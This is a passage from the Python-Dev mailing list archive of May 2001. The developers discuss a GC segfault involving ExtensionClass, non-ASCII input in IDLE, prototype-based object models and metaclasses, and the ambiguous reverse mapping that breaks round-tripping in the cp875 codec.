> run it as a script from the shell prompt, I get no segfault. > 3. If I first import the gtk module, then import my module, I get no > segfault. > 4. Most changes I make to the module causing the problem cause the > problemm to disappear. > > All told, all this really tells me is I'm probably dealing with a > malloc/free problem of some sort. > > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. AFAIK, the latest version of Zope (which uses ExtensionClass extensively if not exclusively :-) works fine with Python 2.1. 
This suggests pointing a finger towards the PyGtk code... :-( --Guido van Rossum (home page: http://www.python.org/~guido/) From loewis@informatik.hu-berlin.de Fri May 11 21:53:55 2001 From: loewis@informatik.hu-berlin.de (Martin von Loewis) Date: Fri, 11 May 2001 22:53:55 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Thanks to a bug report I got, I noticed for the first time that you cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell prompt, you may get >>> s='äö' UnicodeError: ASCII encoding error: ordinal not in range(128) Likewise, when trying to save a file that has non-ASCII characters, you get a traceback. Now, I think I understand all the causes of the problem (Tkinter returning Unicode objects, and so on). However, I'm curious whether anybody has proposals on how to deal with it. For saving text files, if Python had an encoding directive, things might be easier :-) For the shell prompt, I've no idea how to solve this best. So any suggestions are welcome. Regards, Martin From fredrik@pythonware.com Fri May 11 23:18:27 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 00:18:27 +0200 Subject: [Python-Dev] status of pre? References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid> guido wrote: > > We could put a warning on using pre or pcre in 2.2, and remove it in > 2.3, hoping that /F fixes the recursion limit problems in the mean > time (weren't those related to the backtracking implementation)? 2.2 is to be released in october, right? I'm sure I could shake out the remaining bugs in my "stackless SRE" patch until then... Cheers /F From fredrik@effbot.org Sat May 12 00:03:10 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:03:10 +0200 Subject: [Python-Dev] Hats off to them!
Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid> http://www.theregister.co.uk/content/4/18909.html "Microsoft Altair BASIC legend talks about Linux, CPRM and that very frightening photo ... His other passion, he tells us, is Python. "Hats off to them. It's an extremely well designed language. It's object orientated from the get-go. They've really succeeded there," he says, and commends it as the ideal teaching language. That used to be BASIC, of course" ... (no, it's not Bill) Cheers /F From fredrik@effbot.org Sat May 12 00:14:47 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Sat, 12 May 2001 01:14:47 +0200 Subject: [Python-Dev] Hats off to them! References: <014a01c0da6e$93578ca0$e46940d5@hagrid> Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid> > "Hats off to them. It's an extremely well designed language. It's > object orientated from the get-go. They've really succeeded there," > he says, and commends it as the ideal teaching language. That > used to be BASIC, of course" reading on, I'm not sure why BASIC ever was the ideal teaching language: http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11 "One of the nice things about this BASIC is it has this so called direct mode. So you can PRINT 2 + 2. It prints the square root of ten" Cheers /F From sdm7g@Virginia.EDU Sat May 12 03:43:31 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Fri, 11 May 2001 22:43:31 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook> Message-ID: On Fri, 11 May 2001, Thomas Heller wrote: > I never looked at Self or other prototype based systems. > Is it really true that prototypes are a lot simpler than > metaclasses, but on the other hand more powerful? Definitely simpler: No classes, No metaclasses, only objects. Ignore for now the fact that a limited set of classes are handier for a statically type checked language and just consider dynamic languages, which is their proper domain. 
Prototype semantics basically subsume class semantics. Any object can be an exemplar and fill the role of a class, and it can be used ONLY as a template and holder of shared behaviour, so it can be used like a class. [One of the Self papers -- one which I haven't read -- is entitled "Self includes Smalltalk" -- and is, I believe, a demonstration that Smalltalk is sort of a subset of Self.] But you can also have finer grain classification and you can have object inheritance. ( This is handy in XlispStat, which is oriented towards statistics and analysis: you can have derived objects, for example different subsamples of the same population, or in my app, different energy spectra, along with derived and processed spectra with special rules for treatment: e.g. linear filtered spectra have a filter function or kernel, and if they are fit against reference spectra, they need to be fit against references that have had the same filter applied to them -- if none available create one from unfiltered samples -- and maybe a whole chain of derived data. In a class based system, you would have to manually maintain a separate linked list of objects, but in a prototype system they can all be cloned from their parent objects. ) The other plus for things like exploratory statistics is that you don't have to design a class hierarchy ahead of time -- it's more concrete and less abstract than a class based system. Prototypes can also solve some of the sort of problems that Jim Fulton's acquisition framework in Zope is designed to handle. (But it's been a while since I read that paper and I haven't used it, so I'm relying on my memory of thinking "Yeah -- that would be simpler with prototypes" ) You definitely don't have to worry about simulating the Prototype Pattern. (I've seen GUI systems in C++ that go thru a lot of code to add prototype-like behavior to C++ classes.) But -- unless I can figure a useful way to use it under the covers, it's not really a topic for python-dev.
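Steve's description of objects that act as exemplars, with derived data cloned from its parents, can be sketched in a few lines of Python 3. The sketch is hypothetical: `Proto` and `clone()` are illustrative names, and it is not how Self, XlispStat or any other real prototype system is implemented. Each object keeps its own slots and delegates failed lookups to its parent. A later change to a parent is therefore visible to every clone made from it.

```python
class Proto:
    """A hypothetical prototype object: no classes, only objects and parents."""

    def __init__(self, parent=None, **slots):
        # Use object.__setattr__ so this bookkeeping bypasses our own
        # __setattr__ below and lands in the ordinary instance __dict__.
        object.__setattr__(self, "_parent", parent)
        object.__setattr__(self, "_slots", dict(slots))

    def clone(self, **slots):
        # A clone holds only its overrides and delegates the rest to self.
        return Proto(self, **slots)

    def __getattr__(self, name):
        # Called only when normal lookup fails, i.e. for slot names.
        obj = self
        while obj is not None:
            slots = object.__getattribute__(obj, "_slots")
            if name in slots:
                value = slots[name]
                if callable(value):
                    # Treat stored callables as methods bound to the
                    # object that *received* the lookup, not the holder.
                    return lambda *args, **kw: value(self, *args, **kw)
                return value
            obj = object.__getattribute__(obj, "_parent")
        raise AttributeError(name)

    def __setattr__(self, name, value):
        # Assignment always writes a slot on this object, never a parent.
        self._slots[name] = value


# Loosely modelled on Steve's spectra: derived data cloned from a parent.
spectrum = Proto(kind="spectrum",
                 describe=lambda self: f"{self.kind} with {self.n} points")
raw = spectrum.clone(n=1024)
filtered = raw.clone(kind="filtered spectrum")

print(filtered.describe())      # filtered spectrum with 1024 points
spectrum.kind = "energy spectrum"
print(raw.describe())           # energy spectrum with 1024 points
```

No class hierarchy is designed up front. `spectrum` plays the role of a class simply because other objects were cloned from it, and `filtered` overrides only the one slot it needs.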
> The 'brain exploding properties' of metaclasses are IMO > only there because my brain cannot think easily in too > many recursion steps... It's just like spelling bananana -- the problem is to know when to stop! ;-) -- Steve Majewski From tim_one@email.msn.com Sat May 12 12:28:27 2001 From: tim_one@email.msn.com (Tim Peters) Date: Sat, 12 May 2001 07:28:27 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: I have a way to make dict lookup a teensy bit cheaper(*) that significantly reduces the number of collisions (which is much more valuable). This caused a number of std tests to fail, because they were implicitly relying on the order in which a dict's entries are materialized via .keys() or .items(). Most of these were easy enough to fix. The last failure remaining is test_unicode, and I don't know how to fix it. It's dying here: try: verify(unicode(s,encoding).encode(encoding) == s) except TestFailed: print '*** codec "%s" failed round-trip' % encoding except ValueError,why: print '*** codec for "%s" failed: %s' % (encoding, why) when encoding == "cp875". There's a bogus problem you have to worm around first: test_unicode neglected to import TestFailed, so it actually dies with NameError while trying the "except TestFailed" clause after verify() raises TestFailed. Once that's repaired, it's complaining about failing the round-trip encoding. The original character in s it's griping about is "?" (0x3f). cp875.py has this entry in its decoding_map dict: 0x003f: 0x001a, # SUBSTITUTE But 0x1a is not a *unique* value in this dict. There's also 0x00dc: 0x001a, # SUBSTITUTE 0x00e1: 0x001a, # SUBSTITUTE 0x00ec: 0x001a, # SUBSTITUTE 0x00ed: 0x001a, # SUBSTITUTE 0x00fc: 0x001a, # SUBSTITUTE 0x00fd: 0x001a, # SUBSTITUTE Therefore what appears associated with 0x1a in the derived encoding_map dict: encoding_map = {} for k,v in decoding_map.items(): encoding_map[v] = k may end up being any of the 7 decoding_map keys that map to 0x1a. 
It just so happened to map back to 0x3f before, but to 0xfd after the dict change, so "?" doesn't survive the round trip anymore. My knowledge of encoding internals is exceeded only by my mastery of file URLs under Windows, so I could sure use some help getting this repaired. I'd really like to check in the dict improvement (+ test repairs), but won't do it so long as it makes a std test fail. If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings winning the game, then iterating over decoding_map.items() in reverse sorted order would do the trick reliably. But I don't know whether the ambiguity in cp875 is a bug or an undocumented feature ... 7-bit-ascii-looks-better-every-day-ly y'rs - tim (*) Simply by taking the damn "~" off "~hash" -- I explained quite a while ago why that can lead to a weak form of clustering "in theory", and instrumenting the dict lookup code confirmed that it does hurt in real life. From guido@digicool.com Sat May 12 13:28:23 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 07:28:23 -0500 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400." References: Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Do prototype-based language have the equivalence of multiple inheritance? --Guido van Rossum (home page: http://www.python.org/~guido/) From tim_one@email.msn.com Sat May 12 13:16:33 2001 From: tim_one@email.msn.com (Tim Peters) Date: Sat, 12 May 2001 08:16:33 -0400 Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Just as for class-based languages, whether a prototype-based language supports an MI workalike varies by language.
In a class-based language with MI, a class can have multiple base classes; in a prototype-based language with an MI workalike, an object can have multiple prototype objects. The same kinds of ambiguities can arise, and the same kinds of resolution strategies are applicable (imposed linearization; user-supplied qualification; user-supplied renaming; guessing <0.7 wink>). JavaScript is the best-known prototype language that does not support multiple prototypes per object. A very readable intro to its object model is here: http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf It's interesting because, near the end, the author explores a bit how far you can get *trying* to fake MI in JS. The answer is "farther than you might think", but not all the way. From fredrik@pythonware.com Sat May 12 13:25:43 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 14:25:43 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? References: Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid> tim wrote: > If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings > winning the game, then iterating over decoding_map.items() in reverse sorted > order would do the trick reliably. reverse sorting makes sense to me. but the cp-files appear to be machine generated, so patching that python file won't help. > But I don't know whether the ambiguity in cp875 is a bug or an undocumented > feature ... a truly future-proof solution would be to specify exactly how to resolve every many-to-one mapping, for every font having that problem. but sorting them is clearly better than relying on implementation-dependent behaviour... (is Jython using exactly the same hashing and dictionary algorithms as CPython? or does it work by accident also under Jython?) 
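The cp875 problem Tim describes, and the reverse-sorted fix he and Fredrik discuss, can be reproduced in isolation. The following is a sketch under stated assumptions: the seven entries are the ones quoted from cp875.py, but `invert_naive` and `invert_lowest_wins` are hypothetical helper names, and this is not the code that was actually checked in to the codec generator. Since Python 3.7+ dicts iterate in insertion order, the sketch simulates "the dict implementation changed" by inserting the same entries in reverse order.

```python
# The seven ambiguous entries quoted from cp875.py: each of these byte
# values decodes to U+001A (SUBSTITUTE).
decoding_map = {
    0x003F: 0x001A,
    0x00DC: 0x001A,
    0x00E1: 0x001A,
    0x00EC: 0x001A,
    0x00ED: 0x001A,
    0x00FC: 0x001A,
    0x00FD: 0x001A,
}


def invert_naive(decoding_map):
    """Derive encoding_map as quoted from cp875.py: the last key written wins."""
    encoding_map = {}
    for k, v in decoding_map.items():
        encoding_map[v] = k
    return encoding_map


def invert_lowest_wins(decoding_map):
    """Iterate in reverse sorted order so the smallest key is written last."""
    encoding_map = {}
    for k, v in sorted(decoding_map.items(), reverse=True):
        encoding_map[v] = k
    return encoding_map


# Same entries, different iteration order.
reordered = dict(reversed(list(decoding_map.items())))

print(hex(invert_naive(decoding_map)[0x1A]))        # 0xfd
print(hex(invert_naive(reordered)[0x1A]))           # 0x3f
print(hex(invert_lowest_wins(decoding_map)[0x1A]))  # 0x3f
print(hex(invert_lowest_wins(reordered)[0x1A]))     # 0x3f
```

With the naive inversion, which byte "?" encodes back to depends purely on iteration order. Sorting makes the choice (lowest byte value wins) independent of the dict implementation, which would also answer Fredrik's Jython question.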
Cheers /F From nas@python.ca Sat May 12 15:28:54 2001 From: nas@python.ca (Neil Schemenauer) Date: Sat, 12 May 2001 07:28:54 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500 References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <20010512072854.A4271@glacier.fnational.com> skip@pobox.com wrote: > > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. Do any of the PyGtk objects define the GC type flag? The GC is fairly good at exposing memory management bugs that otherwise go unnoticed. If you're using glibc you can try setting the MALLOC_CHECK_ environment variable to 2. If you've got lots of memory you could also try using Electric Fence and running your program. Finally, you might try compiling with Py_DEBUG set. > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. I'd be willing to take a look (the chances of me reproducing it don't look good). A public RSA key is attached.
Neil 1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas From sdm7g@Virginia.EDU Sat May 12 16:07:06 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 11:07:06 -0400 (EDT) Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Yeah ... What Tim said... Also: There are two basic implementation models: Delegation [a.k.a. "Lifetime sharing", cloning] sort of like python -- if you don't know how to handle it "ask" a parent object. ( "ask" in quotes, because I've recently been in a long argument about whether Objective-C & Smalltalk can really be said to "send messages", or if it's "just" dynamic lookup and function application! ) Extension [a.k.a. "Birth sharing", copying, concatenation ] more like how I imagine C++ vtables are built -- the python equivalent would be like merging all of the class __dict__'s together with name-clash priority going to the nearest relative. ( "Life Sharing" vs. "Birth Sharing" -- is a change in the base class after object creation inherited by the object? ) I think most Multiple-Inheritance languages use delegation, but there's no reason it won't work with extension. The difference is that in extension, everything has to get resolved at object creation.
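The difference between the two models, and the "life sharing" vs. "birth sharing" question, can be shown with a toy Python model. `Proto`, `flatten` and `extend` are hypothetical names invented for this sketch. Lookup through several parents uses a depth-first, left-to-right search, which is only one of the resolution strategies mentioned in this thread.

```python
class Proto:
    """Delegation ("life sharing"): a slot that is not found locally is
    looked up in the parent objects at access time, depth-first and
    left to right."""

    def __init__(self, *parents, **slots):
        self.parents = list(parents)
        self.slots = dict(slots)

    def lookup(self, name):
        if name in self.slots:
            return self.slots[name]
        for parent in self.parents:
            try:
                return parent.lookup(name)
            except KeyError:
                continue
        raise KeyError(name)


def flatten(proto):
    """Collect every slot visible through proto, honoring lookup priority."""
    merged = {}
    for parent in reversed(proto.parents):  # later parents lose clashes
        merged.update(flatten(parent))
    merged.update(proto.slots)              # own slots win over all parents
    return merged


def extend(*parents, **slots):
    """Extension ("birth sharing"): copy the parents' slots into a new,
    parentless object at creation time; nearer parents win name clashes."""
    merged = flatten(Proto(*parents))
    merged.update(slots)
    return Proto(**merged)


base = Proto(greet="hello")
delegating = Proto(base)
extended = extend(base)

base.slots["greet"] = "hi"           # change the parent after creation
print(delegating.lookup("greet"))    # hi    (sees the change)
print(extended.lookup("greet"))      # hello (copied at birth)
```

With multiple parents, `Proto(a, b).lookup(name)` and `extend(a, b).lookup(name)` both prefer `a` on a name clash. They differ only in whether later changes to `a` or `b` are seen.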
Extension could be made more flexible if on creation, you could not only add new methods, but rearrange and control the extension process ( sort of like "from xxx import yyy; from aaa import bbb" ). I would think one could use delegation by default, but provide an extension mechanism as an optimization, but I don't know if there's any system that does this. If it follows the paradigm, a prototype system doesn't have an 'isa' or '__class__' slot -- only a (linked) list of parent objects. But if you were simulating class orientation, one would add an 'isa' slot for the immediate prototype, and probably enforce some restrictions on the prototype objects that were playing the role of class objects. "If it follows the paradigm" -- as in OO in general, there are several flavors and implementations and some may be hybrid systems. Self is the language most widely known as a prototype-based language; some others: NewtonScript (from Apple's late lamented Newton palmtop), Kevo (a Forth-based o-o language), Cardelli's Obliq (This didn't stick in my mind from when I read the papers back in the "safe python" development days, but it's listed in my book.) as well as XlispStat's object system (which isn't listed in that book, but there is an ObjectLisp -- I don't know if they were at all related), and Tim said JavaScript. The Amulet and Garnet GUI systems are prototype-based -- Garnet written in Lisp and Amulet in C++. For NewtonScript, Kevo, and maybe JavaScript, I suspect the simplicity of the system was a motivation. ("the book" I'm reading is "Prototype-Based Programming -- Concepts, Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan Moore, pub. Springer. A collection of papers, some of which are available on the Web -- I know the Self papers, one description of NewtonScript, and one or two articles on Kevo are online, as well as Cardelli's Obliq paper.
) -- "Steve" Majewski From martin@loewis.home.cs.tu-berlin.de Sat May 12 20:16:58 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 21:16:58 +0200 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> > Has anyone investigated interactions between ExtensionClass objects > and GC? At some point, extension classes used a literal copy of PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, and only had the spare fields that were expected then. Today, PyTypeObject has many more fields, so extension objects produce random errors (e.g. with GC) when used in a modern interpreter (where the copy has not been synchronized). Whatever immediately follows the type object in memory may be interpreted as the GC flag. Regards, Martin From guido@digicool.com Sat May 12 22:08:05 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:08:05 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200." <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> > At some point, extension classes used a literal copy of > PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, > and only had the spare fields that were expected then. Today, > PyTypeObject has many more fields, so extension objects produce random > errors (e.g. with GC) when used in a modern interpreter (where the copy > has not been synchronized). Whatever immediately follows the type > object in memory may be interpreted as the GC flag. Not quite true. ExtensionClasses (at least recent versions that worked with 1.5.2) contain a copy of the type object up to and including the tp_flags field, and the 2.1 code is careful not to use any newer fields without first checking the corresponding flag bit.
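The compatibility rule Guido describes, touching fields newer than tp_flags only after checking a flag bit, can be modelled in a few lines of Python. This is a toy sketch: `TypeRecord`, `get_traverse` and `TPFLAGS_HAVE_GC` are hypothetical names, not CPython's real constants or structures. Python attribute access also stands in for C struct layout, so skipping the check here raises AttributeError, whereas in C it would read whatever memory follows the shorter struct.

```python
# Hypothetical flag value; CPython's real Py_TPFLAGS_* constants are not used.
TPFLAGS_HAVE_GC = 1 << 14


class TypeRecord:
    """Toy model of a type object. Fields newer than tp_flags are optional,
    the way an older struct layout simply stops after tp_flags."""

    def __init__(self, name, flags=0, **newer_fields):
        self.tp_name = name
        self.tp_flags = flags
        for field, value in newer_fields.items():
            setattr(self, field, value)


def get_traverse(tp):
    """Read tp_traverse only when the flag bit says the field exists."""
    if tp.tp_flags & TPFLAGS_HAVE_GC:
        return tp.tp_traverse
    return None


old_style = TypeRecord("ExtensionClass")  # no flag bit, no tp_traverse
gc_aware = TypeRecord("list", TPFLAGS_HAVE_GC,
                      tp_traverse=lambda obj: "traversed")

print(get_traverse(old_style))             # None
print(get_traverse(gc_aware)("anything"))  # traversed
```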
Now, if you are using the 1.4 version of ExtensionClasses you might not have the tp_flags field either (I don't know, I can't easily check) but the 1.5.2-compatible version of ExtensionClasses doesn't even require recompilation to work with Python 2.1. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin@loewis.home.cs.tu-berlin.de Sat May 12 21:12:39 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 22:12:39 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> > But I don't know whether the ambiguity in cp875 is a bug or an > undocumented feature The official (as in "as official as it gets") mapping between CP 875 and Unicode is at http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT This is also the file which served as an input to generate cp875.py. Character 1A, which is the mapping result of these characters, is indeed known with the name "SUBSTITUTE", apparently following the definition in http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm # substitute character (SUB): A control character that is used in the # place of a character that is recognized to be invalid or in error or # that cannot be represented on a given device. That would suggest that these characters in EBCDIC 875 do not have equivalents in Unicode. However, http://www.kostis.net/charsets/ebc875.htm suggests that the characters in question (3F, DC, E1, EC, ED, FC, and FD) have no character meaning at all. It seems that IBM's ICU library also maps U+001A to character 3F, see http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup It appears, from looking at http://www.natural-innovations.com/boo/asciiebcdic.html that byte 3F *is* the substitution character in EBCDIC. 
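Since 0x3F is EBCDIC's own SUB character, one way to make the reverse map well-defined is to parse the vendor mapping, report which code points are reached from several bytes, and pin U+001A to 0x3F explicitly. The sketch below assumes the tab-separated `byte, code point, #name` line layout of the Unicode.org vendor mapping files. `MAPPING_TEXT` is an illustrative excerpt rather than a verbatim copy of CP875.TXT, and `parse_mapping`, `ambiguous_targets` and `invert_with_overrides` are hypothetical helper names.

```python
# Illustrative lines in the assumed "0xBB<TAB>0xUUUU<TAB>#NAME" layout;
# this is not a verbatim excerpt of CP875.TXT.
MAPPING_TEXT = """\
# Comment lines start with '#'
0x3F\t0x001A\t#SUBSTITUTE
0x40\t0x0020\t#SPACE
0xDC\t0x001A\t#SUBSTITUTE
0xE1\t0x001A\t#SUBSTITUTE
0xEC\t0x001A\t#SUBSTITUTE
0xED\t0x001A\t#SUBSTITUTE
0xFC\t0x001A\t#SUBSTITUTE
0xFD\t0x001A\t#SUBSTITUTE
"""


def parse_mapping(text):
    """Return {byte: code point}, ignoring comments and blank lines."""
    decoding_map = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        decoding_map[int(fields[0], 16)] = int(fields[1], 16)
    return decoding_map


def ambiguous_targets(decoding_map):
    """Return {code point: sorted bytes} for code points with several sources."""
    sources = {}
    for byte, codepoint in decoding_map.items():
        sources.setdefault(codepoint, []).append(byte)
    return {cp: sorted(bs) for cp, bs in sources.items() if len(bs) > 1}


def invert_with_overrides(decoding_map, overrides):
    """Invert decoding_map, then let explicit overrides settle ambiguities."""
    encoding_map = {cp: byte for byte, cp in decoding_map.items()}
    encoding_map.update(overrides)
    return encoding_map


decoding_map = parse_mapping(MAPPING_TEXT)
encoding_map = invert_with_overrides(decoding_map, {0x001A: 0x3F})

# Bytes that do not survive decode-then-encode: every SUBSTITUTE byte but 0x3F.
lossy = sorted(b for b, cp in decoding_map.items() if encoding_map[cp] != b)
print([hex(b) for b in lossy])  # ['0xdc', '0xe1', '0xec', '0xed', '0xfc', '0xfd']
```

The printed list shows the limit of any fix that keeps all seven decoding entries: only one byte can be the encoding target, which is why dropping the other SUBSTITUTE entries is the alternative raised in this thread.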
So it is a bug in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC character which is mapped to SUBSTITUTE; I think cp875 should be corrected to always map U+001A to 3F. That is not something the generator can currently do, though. So I think we can take one of two approaches: 1. admit that CP 875 is not round-trippable, and exclude it from the test (although when looking at the first 128 characters only, it is round-trippable). 2. remove the SUBSTITUTE mappings from CP875, acknowledging that apparently these characters have no meaning in that code page. Unfortunately, I could not find any official IBM documentation page that lists the characters supported in each of the EBCDIC code pages. The second seems to be more correct to me, although it is a deviation from the Unicode Consortium publications. Regards, Martin From guido@digicool.com Sat May 12 22:21:21 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:21:21 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400." References: Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> > Also: There are two basic implementation models: > > Delegation [a.k.a. "Lifetime sharing", cloning] > sort of like python -- if you don't know how to handle it "ask" > a parent object. ( "ask" in quotes, because I've recently been > in a long argument about whether Objective-C & Smalltalk can > really be said to "send messages", or if it's "just" dynamic > lookup and function application! ) > > Extension [a.k.a. "Birth sharing", copying, concatenation ] > more like how I imagine C++ vtables are built -- the python > equivalent would be like merging all of the class __dict__'s > together with name-clash priority going to the nearest > relative. > > ( "Life Sharing" vs. "Birth Sharing" -- is a change in the > base class after object creation inherited by the object? ) Interesting.
So is the rest of this thread, but since Python is not a prototype language and is unlikely to become one, I'd like to mention that Python 2.2 will likely allow you to choose either paradigm, on a per-class basis, using metaclasses. I'm finding metaclasses in Python useful for different things than they are in Smalltalk, and I expect that they will continue to play a less important role. But they are important because they control many "policy" aspects of Python classes/types: e.g. whether instances have a __dict__ or a specific set of slots (maybe even typed slots), whether changes can be made to a class after it's been created, the semantics of multiple inheritance, and so on. Right now, my metaclasses continue to be implemented in C, although I expect that eventually they will be subclassable in Python. Watch the descr-branch in the CVS tree. I hope I'll soon have some time to write a PEP, too. It's an interesting journey! The book I am reading about this: "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. http://cseng.awl.com/book/0,3828,0201433052,00.html --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g@Virginia.EDU Sat May 12 21:53:26 2001 From: sdm7g@Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 16:53:26 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> Message-ID: On Sat, 12 May 2001, Guido van Rossum wrote: > Interesting. So is the rest of this thread, but since Python is not a > prototype language and is unlikely to become one, I'd like to mention > that Python 2.2 will likely allow you to choose either paradigm, on a > per-class basis, using metaclasses. As I said earlier: the only advantage would be if it could simplify things "under the hood" (compared to metaclasses) but could still provide the same Class semantics (with maybe a "proto" declaration sneaking its nose in under the tent.)
But I have no immediate idea how to do that, and it sounds like you're pretty far along into an implementation already. > I'm finding metaclasses in Python useful for different things than > they are in Smalltalk, and I expect that they will continue to play a > less important role. But they are important because they control many > "policy" aspects of Python classes/types: e.g. whether instances have > a __dict__ or a specific set of slots (maybe even typed slots), > whether changes can be made to a class after it's been created, the > semantics of multiple inheritance, and so on. I guess my practical question, which I meant to ask before I got myself sidetracked into preaching prototypes, is: How much of the existing plumbing (specifically the Don Beaudry hack) can I rely on in the future for the Objective-C/Python bridge? With BOOST and Zope's extension classes relying on it, can I assume that it's being extended rather than replaced? ( I guess I ought to take a look at the code! ) > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html Thanks for the reference. Talking about interesting journeys: Guido: did you ever imagine back at that first workshop at NIST that you and Python would be where you are today? -- Steve Majewski From gmcm@hypernet.com Sat May 12 22:09:41 2001 From: gmcm@hypernet.com (Gordon McMillan) Date: Sat, 12 May 2001 17:09:41 -0400 Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> References: Your message of "Sat, 12 May 2001 11:07:06 -0400." Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost> [Guido] > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html The two things that struck me most when I read that last year:

- How eminently ill-suited C++ is for this stuff (the book develops a framework in C++)
- a very convincing argument that if you derive C from A and B (whose metaclasses are not the same), the system must derive a metaclass for C, using MI from A and B's metaclasses.

duct-tape-skull-cap-advised-ly y'rs - Gordon From tim.one@home.com Sat May 12 22:22:49 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 12 May 2001 17:22:49 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: [/F] > reverse sorting makes sense to me. but the cp-files appear to be > machine generated, so patching that python file won't help. Agreed. > a truly future-proof solution would be to specify exactly how to > resolve every many-to-one mapping, for every font having that > problem. but sorting them is clearly better than relying on > implementation-dependent behaviour... The attached program suggests the problem is rare; of those encoding files that have a Python decoding_map dict, only these triggered a meaningful ambiguity complaint:

    *** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
    *** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875 is the only one that *can* fail (the ambiguities in cp1006 are for points > 0x7f, so aren't tested here). Hmm! Now I see that in a part of test_unicode that wasn't reached, cp875 and cp1006 are excluded, with this comment:

    ### These fail the round-trip:
    #'cp1006', 'cp875', 'iso8859_8',

